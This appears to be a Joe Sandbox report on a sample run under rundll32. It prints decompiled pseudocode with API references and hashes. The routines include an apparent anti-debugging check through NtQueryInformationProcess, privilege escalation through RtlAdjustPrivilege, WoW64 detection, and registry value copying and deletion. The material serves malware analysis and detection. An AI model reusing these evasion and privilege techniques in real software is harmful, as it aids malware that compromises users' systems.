                                                                                              				void _v32;
                                                                                              				signed int _t6;
                                                                                              				_Unknown_base(*)()* _t11;
                                                                                              				void* _t23;
                                                                                              				signed int _t30;
                                                                                              
                                                                                              				_t32 = (_t30 & 0xfffffff8) - 0x20;
                                                                                              				_t6 =  *0x42a4008; // 0xd33db39d
                                                                                              				_v8 = _t6 ^ (_t30 & 0xfffffff8) - 0x00000020;
                                                                                              				_t23 = OpenProcess(0x400, 0, GetCurrentProcessId());
                                                                                              				if(_t23 != 0) {
                                                                                              					_t11 = GetProcAddress(GetModuleHandleW(L"ntdll"), "NtQueryInformationProcess");
                                                                                              					if(_t11 != 0) {
                                                                                              						 *_t11(_t23, 0,  &_v32, 0x18, 0);
                                                                                              						_t27 =  ==  ? _v32 : 0;
                                                                                              					}
                                                                                              					CloseHandle(_t23);
                                                                                              					return E04275AFE(_v8 ^ _t32);
                                                                                              				} else {
                                                                                              					return E04275AFE(_v8 ^ _t32);
                                                                                              				}
                                                                                              			}









                                                                                              0x04265d46
                                                                                              0x04265d49
                                                                                              0x04265d50
                                                                                              0x04265d6b
                                                                                              0x04265d6f
                                                                                              0x04265d93
                                                                                              0x04265d9b
                                                                                              0x04265da9
                                                                                              0x04265dad
                                                                                              0x04265dad
                                                                                              0x04265db3
                                                                                              0x04265dcb
                                                                                              0x04265d71
                                                                                              0x04265d81
                                                                                              0x04265d81

                                                                                              APIs
                                                                                              • GetCurrentProcessId.KERNEL32(?,00000000,?,?,?,?,?,04266FEC,00000000,74CB4DC0), ref: 04265D58
                                                                                              • OpenProcess.KERNEL32(00000400,00000000,00000000,?,?,?,?,?,04266FEC,00000000,74CB4DC0), ref: 04265D65
                                                                                              • GetModuleHandleW.KERNEL32(ntdll,NtQueryInformationProcess,?,?,?,?,?,04266FEC,00000000,74CB4DC0), ref: 04265D8C
                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 04265D93
                                                                                              • CloseHandle.KERNEL32(00000000,?,?,?,?,?,04266FEC,00000000,74CB4DC0), ref: 04265DB3
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.448598550.0000000004250000.00000040.00001000.00020000.00000000.sdmp, Offset: 04250000, based on PE: true
                                                                                              • Associated: 0000000A.00000002.448863141.0000000004294000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_4250000_rundll32.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: HandleProcess$AddressCloseCurrentModuleOpenProc
                                                                                              • String ID: NtQueryInformationProcess$ntdll
                                                                                              • API String ID: 2704359807-2585995557
                                                                                              • Opcode ID: f54a97840881935f5d7f0fb20224a7829534215353110ee7ef7d88bb39817983
                                                                                              • Instruction ID: 06b42ee953e48a4ab9c2049d61cd2335471958b9067de33e06a3c00beb2c45d1
                                                                                              • Opcode Fuzzy Hash: f54a97840881935f5d7f0fb20224a7829534215353110ee7ef7d88bb39817983
                                                                                              • Instruction Fuzzy Hash: 4C01B5323142016FD710BBB9BC4EB7B77A8EB89A15F00011DF905D31C0DE64ED418796
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 38%
                                                                                              			E042641C0(void* __ebx, char _a4) {
                                                                                              				void* __ecx;
                                                                                              				void* __edi;
                                                                                              				void* __esi;
                                                                                              				char _t7;
                                                                                              				_Unknown_base(*)()* _t10;
                                                                                              				int _t14;
                                                                                              				void* _t18;
                                                                                              				char* _t19;
                                                                                              				void* _t21;
                                                                                              				void* _t22;
                                                                                              				void* _t23;
                                                                                              				intOrPtr* _t24;
                                                                                              
                                                                                              				_t18 = __ebx;
                                                                                              				_t7 = _a4;
                                                                                              				_t24 = _t19;
                                                                                              				 *_t24 = 0x429e8b0;
                                                                                              				 *((intOrPtr*)(_t24 + 4)) = _t7;
                                                                                              				 *((intOrPtr*)(_t7 + 0x38)) = _t24;
                                                                                              				 *((intOrPtr*)(_t24 + 8)) = CreateEventW(0, 1, 0, 0);
                                                                                              				 *_t24 = 0x429ee4c;
                                                                                              				_t10 = GetProcAddress(LoadLibraryA("ntdll.dll"), "RtlAdjustPrivilege");
                                                                                              				if(_t10 == 0) {
                                                                                              					E0426AD30(_t24);
                                                                                              				} else {
                                                                                              					_t19 =  &_a4;
                                                                                              					 *_t10(0x14, 1, 0, _t19);
                                                                                              				}
                                                                                              				_t23 = E04264C00(_t18, _t21, _t22, _t24);
                                                                                              				if(_t23 != 0) {
                                                                                              					_t14 = LocalSize(_t23);
                                                                                              					_push(_t19);
                                                                                              					_t6 = _t24 + 4; // 0x0
                                                                                              					_push(0x3f);
                                                                                              					_push(_t14);
                                                                                              					_push(_t23);
                                                                                              					E04251C60( *_t6);
                                                                                              					LocalFree(_t23);
                                                                                              				}
                                                                                              				return _t24;
                                                                                              			}















                                                                                              0x042641c0
                                                                                              0x042641c4
                                                                                              0x042641cb
                                                                                              0x042641d3
                                                                                              0x042641d9
                                                                                              0x042641dc
                                                                                              0x042641ea
                                                                                              0x042641ed
                                                                                              0x042641ff
                                                                                              0x04264207
                                                                                              0x04264217
                                                                                              0x04264209
                                                                                              0x04264209
                                                                                              0x04264213
                                                                                              0x04264213
                                                                                              0x04264221
                                                                                              0x04264225
                                                                                              0x04264228
                                                                                              0x0426422e
                                                                                              0x0426422f
                                                                                              0x04264232
                                                                                              0x04264234
                                                                                              0x04264235
                                                                                              0x04264236
                                                                                              0x0426423c
                                                                                              0x0426423c
                                                                                              0x04264248

                                                                                              APIs
                                                                                              • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,?,042A78D8,?,04259CBC,?,042A78D8,00000000), ref: 042641DF
                                                                                              • LoadLibraryA.KERNEL32(ntdll.dll,?,?,042A78D8,?,04259CBC,?,042A78D8,00000000), ref: 042641F3
                                                                                              • GetProcAddress.KERNEL32(00000000,RtlAdjustPrivilege), ref: 042641FF
                                                                                              • LocalSize.KERNEL32(00000000), ref: 04264228
                                                                                              • LocalFree.KERNEL32(00000000,00000000,00000000,0000003F,?,?,?,042A78D8,?,04259CBC,?,042A78D8,00000000), ref: 0426423C
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.448598550.0000000004250000.00000040.00001000.00020000.00000000.sdmp, Offset: 04250000, based on PE: true
                                                                                              • Associated: 0000000A.00000002.448863141.0000000004294000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_4250000_rundll32.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: Local$AddressCreateEventFreeLibraryLoadProcSize
                                                                                              • String ID: RtlAdjustPrivilege$ntdll.dll
                                                                                              • API String ID: 3057455304-64178277
                                                                                              • Opcode ID: 65ca0602d537278f12b05e882fcf6add4efb1eab7932371529729ccebe695c43
                                                                                              • Instruction ID: 562e83d2bd831fa6c8d3e09ecbf727c62c5139764708490ae040c2651598feb2
                                                                                              • Opcode Fuzzy Hash: 65ca0602d537278f12b05e882fcf6add4efb1eab7932371529729ccebe695c43
                                                                                              • Instruction Fuzzy Hash: AF018071364301BBE620BBA9AC4AF67B7A8EB45B40F21401CF246DB180DEB4BC418769
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 37%
                                                                                              			E042659C0(void* __ecx) {
                                                                                              				char _v8;
                                                                                              				intOrPtr _v12;
                                                                                              				char _v44;
                                                                                              				_Unknown_base(*)()* _t10;
                                                                                              				intOrPtr _t13;
                                                                                              				_Unknown_base(*)()* _t15;
                                                                                              				void* _t19;
                                                                                              
                                                                                              				_t19 = __ecx;
                                                                                              				_t10 = GetProcAddress(LoadLibraryA("kernel32.dll"), "GetNativeSystemInfo");
                                                                                              				if(_t10 == 0) {
                                                                                              					L6:
                                                                                              					return 0;
                                                                                              				} else {
                                                                                              					asm("xorps xmm0, xmm0");
                                                                                              					_v12 = 0;
                                                                                              					asm("movups [ebp-0x28], xmm0");
                                                                                              					asm("movups [ebp-0x18], xmm0");
                                                                                              					 *_t10( &_v44);
                                                                                              					_t13 = _v44;
                                                                                              					if(_t13 == 6 || _t13 == 9) {
                                                                                              						_v8 = 0;
                                                                                              						_t15 = GetProcAddress(LoadLibraryA("kernel32.dll"), "IsWow64Process");
                                                                                              						if(_t15 != 0) {
                                                                                              							 *_t15(_t19,  &_v8);
                                                                                              						}
                                                                                              						return 0 | _v8 == 0x00000000;
                                                                                              					} else {
                                                                                              						goto L6;
                                                                                              					}
                                                                                              				}
                                                                                              			}










                                                                                              0x042659d1
                                                                                              0x042659da
                                                                                              0x042659e2
                                                                                              0x04265a41
                                                                                              0x04265a47
                                                                                              0x042659e4
                                                                                              0x042659e4
                                                                                              0x042659e7
                                                                                              0x042659f2
                                                                                              0x042659f6
                                                                                              0x042659fa
                                                                                              0x042659fc
                                                                                              0x04265a03
                                                                                              0x04265a15
                                                                                              0x04265a23
                                                                                              0x04265a2b
                                                                                              0x04265a32
                                                                                              0x04265a32
                                                                                              0x04265a40
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x04265a03

                                                                                              APIs
                                                                                              • LoadLibraryA.KERNEL32(kernel32.dll,GetNativeSystemInfo,00000000,?,?,?,?,?,?,?,?,?,04265AE3,?,?,00000000), ref: 042659D3
                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 042659DA
                                                                                              • LoadLibraryA.KERNEL32(kernel32.dll,IsWow64Process), ref: 04265A1C
                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 04265A23
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.448598550.0000000004250000.00000040.00001000.00020000.00000000.sdmp, Offset: 04250000, based on PE: true
                                                                                              • Associated: 0000000A.00000002.448863141.0000000004294000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_4250000_rundll32.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: AddressLibraryLoadProc
                                                                                              • String ID: GetNativeSystemInfo$IsWow64Process$kernel32.dll
                                                                                              • API String ID: 2574300362-3073145729
                                                                                              • Opcode ID: bb39373f4d0e95cfb3a026f3d4a460a03412741a03b350eff416d31299ec84db
                                                                                              • Instruction ID: f013f0d906bedb22f6dae3b6d2703a4160fe4f3d88ba9fc068fcaaabe0caaeeb
                                                                                              • Opcode Fuzzy Hash: bb39373f4d0e95cfb3a026f3d4a460a03412741a03b350eff416d31299ec84db
                                                                                              • Instruction Fuzzy Hash: C2018431F6530ABBDF04EBF4AC8A6AEBBB8EB48215F145255F845E2040EA74ADD0C754
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 70%
                                                                                              			E04271BE0(intOrPtr __ecx, intOrPtr* _a4, signed char _a7) {
                                                                                              				intOrPtr _v8;
                                                                                              				intOrPtr _v12;
                                                                                              				intOrPtr* _t36;
                                                                                              				intOrPtr _t38;
                                                                                              				void* _t43;
                                                                                              				long _t48;
                                                                                              				intOrPtr _t51;
                                                                                              				intOrPtr _t56;
                                                                                              				signed char _t63;
                                                                                              				intOrPtr _t66;
                                                                                              				struct _CRITICAL_SECTION* _t75;
                                                                                              
                                                                                              				_t36 = _a4;
                                                                                              				_t51 = __ecx;
                                                                                              				_t63 =  *((intOrPtr*)(_t36 + 2));
                                                                                              				_t66 =  *((intOrPtr*)(_t36 + 8));
                                                                                              				_v8 =  *((intOrPtr*)(_t36 + 4));
                                                                                              				_v12 = __ecx;
                                                                                              				_a7 = _t63;
                                                                                              				if( *_t36 != 0xbb4f || _t63 != 1 || (_t63 & 0x000000fe) != 0) {
                                                                                              					__imp__#112(0xd);
                                                                                              					return 2;
                                                                                              				} else {
                                                                                              					_t75 = __ecx + 0x28;
                                                                                              					EnterCriticalSection(_t75);
                                                                                              					_t38 =  *((intOrPtr*)(_t51 + 0x24));
                                                                                              					if(_t38 != 0) {
                                                                                              						if(_t38 != 2) {
                                                                                              							_t56 =  *((intOrPtr*)(_t51 + 0x20));
                                                                                              							if(_t56 != 0) {
                                                                                              								if(_v8 != _t56) {
                                                                                              									goto L21;
                                                                                              								} else {
                                                                                              									goto L18;
                                                                                              								}
                                                                                              							} else {
                                                                                              								 *((intOrPtr*)(_t51 + 0x20)) = _v8;
                                                                                              								 *((intOrPtr*)(_t51 + 0x10)) = timeGetTime();
                                                                                              								 *((intOrPtr*)(_t51 + 0x14)) = 0;
                                                                                              								L18:
                                                                                              								if(_t66 !=  *((intOrPtr*)(_t51 + 0x1c))) {
                                                                                              									if(_t66 == 0) {
                                                                                              										goto L11;
                                                                                              									} else {
                                                                                              										goto L21;
                                                                                              									}
                                                                                              								} else {
                                                                                              									 *((intOrPtr*)(_t51 + 0x24)) = 2;
                                                                                              									asm("sbb edi, edi");
                                                                                              									_t43 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t51 + 4)) + 4)) + 0x9c))( ~( *(_t51 + 8)) &  *(_t51 + 8) + 0x00000004);
                                                                                              									LeaveCriticalSection(_t75);
                                                                                              									return _t43;
                                                                                              								}
                                                                                              							}
                                                                                              						} else {
                                                                                              							if(_v8 !=  *((intOrPtr*)(_t51 + 0x20))) {
                                                                                              								L21:
                                                                                              								_push(0x2746);
                                                                                              								goto L22;
                                                                                              							} else {
                                                                                              								if(_t66 ==  *((intOrPtr*)(_t51 + 0x1c))) {
                                                                                              									L11:
                                                                                              									LeaveCriticalSection(_t75);
                                                                                              									if( *((intOrPtr*)(_t51 + 0xc)) == 0 && _a7 == 1) {
                                                                                              										 *((intOrPtr*)(_t51 + 0xc)) = 1;
                                                                                              									}
                                                                                              									E04271DE0(_t51);
                                                                                              									return 0;
                                                                                              								} else {
                                                                                              									if(_t66 != 0) {
                                                                                              										goto L21;
                                                                                              									} else {
                                                                                              										_t48 = timeGetTime();
                                                                                              										if(_t48 -  *((intOrPtr*)(_t51 + 0x18)) >  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v12 + 4)))) + 0x54))() + _t49) {
                                                                                              											goto L21;
                                                                                              										} else {
                                                                                              											_t51 = _v12;
                                                                                              											goto L11;
                                                                                              										}
                                                                                              									}
                                                                                              								}
                                                                                              							}
                                                                                              						}
                                                                                              					} else {
                                                                                              						_push(0x139f);
                                                                                              						L22:
                                                                                              						__imp__#112();
                                                                                              						LeaveCriticalSection(_t75);
                                                                                              						return 2;
                                                                                              					}
                                                                                              				}
                                                                                              			}














                                                                                              0x04271be6
                                                                                              0x04271bea
                                                                                              0x04271bf3
                                                                                              0x04271bf6
                                                                                              0x04271bf9
                                                                                              0x04271c01
                                                                                              0x04271c04
                                                                                              0x04271c0a
                                                                                              0x04271d38
                                                                                              0x04271d48
                                                                                              0x04271c22
                                                                                              0x04271c23
                                                                                              0x04271c27
                                                                                              0x04271c2d
                                                                                              0x04271c32
                                                                                              0x04271c41
                                                                                              0x04271cad
                                                                                              0x04271cb2
                                                                                              0x04271ccf
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x04271cb4
                                                                                              0x04271cb7
                                                                                              0x04271cc0
                                                                                              0x04271cc3
                                                                                              0x04271cd1
                                                                                              0x04271cd4
                                                                                              0x04271d0e
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x04271cd6
                                                                                              0x04271cdf
                                                                                              0x04271ced
                                                                                              0x04271cf2
                                                                                              0x04271cfb
                                                                                              0x04271d09
                                                                                              0x04271d09
                                                                                              0x04271cd4
                                                                                              0x04271c43
                                                                                              0x04271c49
                                                                                              0x04271d14
                                                                                              0x04271d14
                                                                                              0x00000000
                                                                                              0x04271c4f
                                                                                              0x04271c52
                                                                                              0x04271c81
                                                                                              0x04271c82
                                                                                              0x04271c8c
                                                                                              0x04271c94
                                                                                              0x04271c94
                                                                                              0x04271c9d
                                                                                              0x04271caa
                                                                                              0x04271c54
                                                                                              0x04271c56
                                                                                              0x00000000
                                                                                              0x04271c5c
                                                                                              0x04271c5f
                                                                                              0x04271c78
                                                                                              0x00000000
                                                                                              0x04271c7e
                                                                                              0x04271c7e
                                                                                              0x00000000
                                                                                              0x04271c7e
                                                                                              0x04271c78
                                                                                              0x04271c56
                                                                                              0x04271c52
                                                                                              0x04271c49
                                                                                              0x04271c34
                                                                                              0x04271c34
                                                                                              0x04271d19
                                                                                              0x04271d19
                                                                                              0x04271d25
                                                                                              0x04271d33
                                                                                              0x04271d33
                                                                                              0x04271c32

                                                                                              APIs
                                                                                              • RtlEnterCriticalSection.NTDLL(?), ref: 04271C27
                                                                                              • timeGetTime.WINMM ref: 04271C5F
                                                                                              • RtlLeaveCriticalSection.NTDLL(?), ref: 04271C82
                                                                                              • WSASetLastError.WS2_32(00002746), ref: 04271D19
                                                                                              • RtlLeaveCriticalSection.NTDLL(?), ref: 04271D25
                                                                                              • WSASetLastError.WS2_32(0000000D), ref: 04271D38
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.448598550.0000000004250000.00000040.00001000.00020000.00000000.sdmp, Offset: 04250000, based on PE: true
                                                                                              • Associated: 0000000A.00000002.448863141.0000000004294000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_4250000_rundll32.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: CriticalSection$ErrorLastLeave$EnterTimetime
                                                                                              • String ID:
                                                                                              • API String ID: 1279346950-0
                                                                                              • Opcode ID: 49353e4576ab787293643a74a9a6b0c6a84ef779a7ea850f5e03b272a3312aa3
                                                                                              • Instruction ID: 9329f72047cd6b0c2cef30f8978c6354d18bfb729008c50ed7b5a9c11ea2b843
                                                                                              • Opcode Fuzzy Hash: 49353e4576ab787293643a74a9a6b0c6a84ef779a7ea850f5e03b272a3312aa3
                                                                                              • Instruction Fuzzy Hash: AC41D6327101009BCB10DFA8D4886B9BBB5EF89321F1581AAEC09CB345D774ED51CB65
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 88%
                                                                                              			E04254670(void* __ecx, void* __eflags, WCHAR* _a4) {
                                                                                              				signed char _t21;
                                                                                              				signed int _t27;
                                                                                              				signed int _t28;
                                                                                              				WCHAR* _t30;
                                                                                              				void* _t37;
                                                                                              				WCHAR* _t38;
                                                                                              				signed int _t39;
                                                                                              				WCHAR* _t40;
                                                                                              				WCHAR* _t41;
                                                                                              				WCHAR* _t42;
                                                                                              
                                                                                              				_t37 = __ecx;
                                                                                              				_t41 = _a4;
                                                                                              				_push(2 + lstrlenW(_t41) * 2);
                                                                                              				_t40 = E0427EF79(_t37);
                                                                                              				if(_t40 != 0) {
                                                                                              					lstrcpyW(_t40, _t41);
                                                                                              					_t42 = _t40;
                                                                                              					if( *_t40 != 0x5c || _t40[1] != 0x5c) {
                                                                                              						if(_t40[1] == 0x3a) {
                                                                                              							_t27 = _t40[2] & 0x0000ffff;
                                                                                              							_t11 =  &(_t40[2]); // 0x4
                                                                                              							_t42 = _t11;
                                                                                              							if(_t27 != 0 && _t27 == 0x5c) {
                                                                                              								_t42 =  &(_t42[1]);
                                                                                              							}
                                                                                              						}
                                                                                              					} else {
                                                                                              						_t28 = _t40[2] & 0x0000ffff;
                                                                                              						_t6 =  &(_t40[2]); // 0x4
                                                                                              						_t38 = _t6;
                                                                                              						if(_t28 != 0) {
                                                                                              							while(_t28 != 0x5c) {
                                                                                              								_t38 = CharNextW(_t38);
                                                                                              								_t28 =  *_t38 & 0x0000ffff;
                                                                                              								if(_t28 != 0) {
                                                                                              									continue;
                                                                                              								}
                                                                                              								goto L7;
                                                                                              							}
                                                                                              						}
                                                                                              						L7:
                                                                                              						_t7 =  &(_t38[1]); // 0x2
                                                                                              						_t30 =  ==  ? _t38 : _t7;
                                                                                              						if( *_t30 != 0) {
                                                                                              							_t39 =  *_t30 & 0x0000ffff;
                                                                                              							while(_t39 != 0x5c) {
                                                                                              								_t30 = CharNextW(_t30);
                                                                                              								_t39 =  *_t30 & 0x0000ffff;
                                                                                              								if(_t39 != 0) {
                                                                                              									continue;
                                                                                              								}
                                                                                              								goto L11;
                                                                                              							}
                                                                                              						}
                                                                                              						L11:
                                                                                              						_t8 =  &(_t30[1]); // 0x2
                                                                                              						_t42 =  ==  ? _t30 : _t8;
                                                                                              					}
                                                                                              					if( *_t42 == 0) {
                                                                                              						L26:
                                                                                              						L0427ED17(_t40);
                                                                                              						return 1;
                                                                                              					} else {
                                                                                              						do {
                                                                                              							if( *_t42 != 0x5c) {
                                                                                              								goto L25;
                                                                                              							} else {
                                                                                              								 *_t42 = 0;
                                                                                              								_t21 = GetFileAttributesW(_t40);
                                                                                              								if(_t21 != 0xffffffff) {
                                                                                              									if((_t21 & 0x00000010) == 0) {
                                                                                              										goto L22;
                                                                                              									} else {
                                                                                              										goto L24;
                                                                                              									}
                                                                                              								} else {
                                                                                              									if(CreateDirectoryW(_t40, 0) != 0 || GetLastError() == 0xb7) {
                                                                                              										L24:
                                                                                              										 *_t42 = 0x5c;
                                                                                              										goto L25;
                                                                                              									} else {
                                                                                              										L22:
                                                                                              										L0427ED17(_t40);
                                                                                              										return 0;
                                                                                              									}
                                                                                              								}
                                                                                              							}
                                                                                              							goto L27;
                                                                                              							L25:
                                                                                              							_t42 = CharNextW(_t42);
                                                                                              						} while ( *_t42 != 0);
                                                                                              						goto L26;
                                                                                              					}
                                                                                              				} else {
                                                                                              					return 0;
                                                                                              				}
                                                                                              				L27:
                                                                                              			}













                                                                                              0x04254670
                                                                                              0x04254674
                                                                                              0x04254686
                                                                                              0x0425468c
                                                                                              0x04254693
                                                                                              0x042546a0
                                                                                              0x042546aa
                                                                                              0x042546b2
                                                                                              0x04254712
                                                                                              0x04254714
                                                                                              0x04254718
                                                                                              0x04254718
                                                                                              0x0425471e
                                                                                              0x04254725
                                                                                              0x04254725
                                                                                              0x0425471e
                                                                                              0x042546bb
                                                                                              0x042546bb
                                                                                              0x042546bf
                                                                                              0x042546bf
                                                                                              0x042546c5
                                                                                              0x042546c7
                                                                                              0x042546d0
                                                                                              0x042546d2
                                                                                              0x042546d8
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x042546d8
                                                                                              0x042546c7
                                                                                              0x042546da
                                                                                              0x042546de
                                                                                              0x042546e1
                                                                                              0x042546e8
                                                                                              0x042546ea
                                                                                              0x042546f0
                                                                                              0x042546f7
                                                                                              0x042546f9
                                                                                              0x042546ff
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x042546ff
                                                                                              0x042546f0
                                                                                              0x04254701
                                                                                              0x04254705
                                                                                              0x04254708
                                                                                              0x04254708
                                                                                              0x0425472c
                                                                                              0x0425478a
                                                                                              0x0425478b
                                                                                              0x04254799
                                                                                              0x04254730
                                                                                              0x04254730
                                                                                              0x04254734
                                                                                              0x00000000
                                                                                              0x04254736
                                                                                              0x04254739
                                                                                              0x0425473c
                                                                                              0x04254745
                                                                                              0x04254775
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x04254747
                                                                                              0x04254752
                                                                                              0x04254777
                                                                                              0x0425477c
                                                                                              0x00000000
                                                                                              0x04254761
                                                                                              0x04254761
                                                                                              0x04254762
                                                                                              0x04254770
                                                                                              0x04254770
                                                                                              0x04254752
                                                                                              0x04254745
                                                                                              0x00000000
                                                                                              0x0425477f
                                                                                              0x04254782
                                                                                              0x04254784
                                                                                              0x00000000
                                                                                              0x04254730
                                                                                              0x04254696
                                                                                              0x0425469a
                                                                                              0x0425469a
                                                                                              0x00000000

                                                                                              APIs
                                                                                              • lstrlenW.KERNEL32(?,?,?,?,0425572D,?,?,?,?), ref: 04254679
                                                                                              • lstrcpyW.KERNEL32(00000000,?), ref: 042546A0
                                                                                              • CharNextW.USER32(00000004), ref: 042546CE
                                                                                              • CharNextW.USER32(00000006), ref: 042546F7
                                                                                              • GetFileAttributesW.KERNEL32(00000000), ref: 0425473C
                                                                                              • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 0425474A
                                                                                              • GetLastError.KERNEL32 ref: 04254754
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.448598550.0000000004250000.00000040.00001000.00020000.00000000.sdmp, Offset: 04250000, based on PE: true
                                                                                              • Associated: 0000000A.00000002.448863141.0000000004294000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_4250000_rundll32.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: CharNext$AttributesCreateDirectoryErrorFileLastlstrcpylstrlen
                                                                                              • String ID:
                                                                                              • API String ID: 227312388-0
                                                                                              • Opcode ID: 3afc0ad03298fa562ce2715459b1dd12217a6d3de6eb7ab15d659edc4d8e8378
                                                                                              • Instruction ID: 631b7c82f56fd7af2a268438132dc7ad5ebb6b9ec8bb04af59295c7dd9efa6e1
                                                                                              • Opcode Fuzzy Hash: 3afc0ad03298fa562ce2715459b1dd12217a6d3de6eb7ab15d659edc4d8e8378
                                                                                              • Instruction Fuzzy Hash: 2631E67172021399DB303F65A844BB6F3F8FF42365B55419AEC48830A0E775B8C2C7A5
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 96%
                                                                                              			E04260A80(void* __ebx, void* __ecx, short* __edx, short* _a4, short* _a8) {
                                                                                              				void* _v8;
                                                                                              				int _v12;
                                                                                              				int _v16;
                                                                                              				void* __esi;
                                                                                              				int* _t25;
                                                                                              				void* _t26;
                                                                                              				int _t34;
                                                                                              				int _t37;
                                                                                              				long _t39;
                                                                                              				char* _t41;
                                                                                              				short* _t43;
                                                                                              				int* _t47;
                                                                                              				void* _t49;
                                                                                              
                                                                                              				_t45 = __ecx;
                                                                                              				_v8 = 0;
                                                                                              				_t47 = 0;
                                                                                              				_v16 = 0;
                                                                                              				_v12 = 0;
                                                                                              				_t48 = 0;
                                                                                              				_t25 = RegOpenKeyExW(__ecx, __edx, 0, 0x103,  &_v8);
                                                                                              				if(_t25 != 0) {
                                                                                              					L11:
                                                                                              					_t26 = _v8;
                                                                                              					if(_t26 != 0) {
                                                                                              						RegCloseKey(_t26);
                                                                                              					}
                                                                                              					if(_t48 != 0) {
                                                                                              						E04275B0F(_t48);
                                                                                              					}
                                                                                              					return _t47;
                                                                                              				}
                                                                                              				_t43 = _a8;
                                                                                              				if(RegQueryValueExW(_v8, _t43, _t25, _t25, _t25, _t25) != 2 || RegQueryValueExW(_v8, _a4, 0,  &_v16, 0,  &_v12) != 0) {
                                                                                              					L10:
                                                                                              					goto L11;
                                                                                              				} else {
                                                                                              					_t34 = _v12;
                                                                                              					_t54 = _t34;
                                                                                              					if(_t34 != 0) {
                                                                                              						_push(_t34);
                                                                                              						_t41 = E04275B55(_t45, 0, _t54);
                                                                                              						_t49 = _t49 + 4;
                                                                                              						_t48 = _t41;
                                                                                              					}
                                                                                              					_t37 = RegQueryValueExW(_v8, _a4, 0,  &_v16, _t48,  &_v12);
                                                                                              					if(_t37 == 0 && RegSetValueExW(_v8, _t43, _t37, _v16, _t48, _v12) == 0) {
                                                                                              						_t39 = RegDeleteValueW(_v8, _a4);
                                                                                              						if(_t39 != 0) {
                                                                                              							RegDeleteValueW(_v8, _t43);
                                                                                              						} else {
                                                                                              							_t21 = _t39 + 1; // 0x1
                                                                                              							_t47 = _t21;
                                                                                              						}
                                                                                              					}
                                                                                              					goto L10;
                                                                                              				}
                                                                                              			}
















                                                                                              0x04260a80
                                                                                              0x04260a8b
                                                                                              0x04260a98
                                                                                              0x04260a9a
                                                                                              0x04260aa4
                                                                                              0x04260aab
                                                                                              0x04260aad
                                                                                              0x04260ab5
                                                                                              0x04260b4f
                                                                                              0x04260b4f
                                                                                              0x04260b54
                                                                                              0x04260b57
                                                                                              0x04260b57
                                                                                              0x04260b5f
                                                                                              0x04260b62
                                                                                              0x04260b67
                                                                                              0x04260b71
                                                                                              0x04260b71
                                                                                              0x04260abc
                                                                                              0x04260ad0
                                                                                              0x04260b4e
                                                                                              0x00000000
                                                                                              0x04260aec
                                                                                              0x04260aec
                                                                                              0x04260aef
                                                                                              0x04260af1
                                                                                              0x04260af3
                                                                                              0x04260af4
                                                                                              0x04260af9
                                                                                              0x04260afc
                                                                                              0x04260afc
                                                                                              0x04260b0f
                                                                                              0x04260b17
                                                                                              0x04260b35
                                                                                              0x04260b3d
                                                                                              0x04260b48
                                                                                              0x04260b3f
                                                                                              0x04260b3f
                                                                                              0x04260b3f
                                                                                              0x04260b3f
                                                                                              0x04260b3d
                                                                                              0x00000000
                                                                                              0x04260b17

                                                                                              APIs
                                                                                              • RegOpenKeyExW.ADVAPI32(?,?,00000000,00000103,?), ref: 04260AAD
                                                                                              • RegQueryValueExW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,00000000,00000103,?), ref: 04260AC7
                                                                                              • RegQueryValueExW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,00000000,00000103,?), ref: 04260AE2
                                                                                              • RegQueryValueExW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,00000000,00000103,?), ref: 04260B0F
                                                                                              • RegSetValueExW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,00000000,00000103,?), ref: 04260B25
